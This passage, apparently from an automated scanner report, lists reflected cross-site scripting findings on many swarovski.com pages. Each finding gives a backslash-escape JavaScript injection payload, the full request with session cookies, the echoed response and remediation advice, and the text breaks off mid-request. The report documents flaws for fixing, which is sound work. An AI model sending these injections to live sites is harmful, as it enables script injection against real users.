Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order, the backslash the application adds in front of each quotation mark is itself doubled, and the string can again be terminated. The same treatment should also cover the closing </script> sequence and line terminators, or, more simply, every non-alphanumeric character can be emitted as a JavaScript \xHH or \uHHHH escape.
Request
GET /Web_US/en/online_shop?97361\'%3balert(1)//bdf29445caa=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... P.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_ShopPage-ViewPage', query: '97361\\';alert(1)//bdf29445caa=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.31. http://www.swarovski.com/Web_US/en/scs_join [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/scs_join
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e329c\'%3balert(1)//45ed15a3e2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e329c\\';alert(1)//45ed15a3e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/scs_join?e329c\'%3balert(1)//45ed15a3e2a=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_SCSApplication-ViewPage', query: 'e329c\\';alert(1)//45ed15a3e2a=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.32. http://www.swarovski.com/Web_US/en/scs_login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/scs_login
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd204\'%3balert(1)//123e81b987d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd204\\';alert(1)//123e81b987d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/scs_login?dd204\'%3balert(1)//123e81b987d=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... FS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CrystalSociety-ViewMemberArea', query: 'dd204\\';alert(1)//123e81b987d=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.33. http://www.swarovski.com/Web_US/en/termsconditions [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/termsconditions
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 459db\'%3balert(1)//46732fbedec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 459db\\';alert(1)//46732fbedec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/termsconditions?459db\'%3balert(1)//46732fbedec=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... SHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewAGB', query: '459db\\';alert(1)//46732fbedec=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.34. http://www.swarovski.com/Web_US/en/tracking [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/tracking
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c897\'%3balert(1)//af399b9afcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c897\\';alert(1)//af399b9afcc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/tracking?9c897\'%3balert(1)//af399b9afcc=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... CO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CustomerService-ViewOrderTracking', query: '9c897\\';alert(1)//af399b9afcc=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.35. http://www.swarovski.com/Web_US/en/youropinion [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/youropinion
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe18a\'%3balert(1)//9e8dab4e476 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe18a\\';alert(1)//9e8dab4e476 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/youropinion?fe18a\'%3balert(1)//9e8dab4e476=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... inity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewYourOpinion', query: 'fe18a\\';alert(1)//9e8dab4e476=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.36. http://www.swarovski.com/index [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /index
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cced\'%3balert(1)//289f8243fc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cced\\';alert(1)//289f8243fc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /index?7cced\'%3balert(1)//289f8243fc6=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_LandingPage-ViewPage', query: '7cced\\';alert(1)//289f8243fc6=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.37. http://www.swarovski.com/is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_Footer-ViewSiteMap [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf3b9\'%3balert(1)//9d724181c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf3b9\\';alert(1)//9d724181c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_Footer-ViewSiteMap?bf3b9\'%3balert(1)//9d724181c51=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewSiteMap', query: 'bf3b9\\';alert(1)//9d724181c51=1'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcdef'}, // path for getting ...[SNIP]...
1.38. http://www.swarovski.com/is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_ViewSearch-AdvancedSearch [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc818\'%3balert(1)//663935cb33b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc818\\';alert(1)//663935cb33b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_ViewSearch-AdvancedSearch?cc818\'%3balert(1)//663935cb33b=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ty/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_ViewSearch-AdvancedSearch', query: 'cc818\\';alert(1)//663935cb33b=1'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcdef'}, // path for getting ...[SNIP]...
1.39. https://www.swarovski.com/Web_US/en/giftcertificate [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.swarovski.com
Path: /Web_US/en/giftcertificate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99911\'%3balert(1)//3c0ed9ce103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99911\\';alert(1)//3c0ed9ce103 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/giftcertificate?99911\'%3balert(1)//3c0ed9ce103=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... FS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewGiftCertificate', query: '99911\\';alert(1)//3c0ed9ce103=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.40. https://www.swarovski.com/Web_US/en/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.swarovski.com
Path: /Web_US/en/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e72d\'%3balert(1)//6d5a55c111 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e72d\\';alert(1)//6d5a55c111 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/login?4e72d\'%3balert(1)//6d5a55c111=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
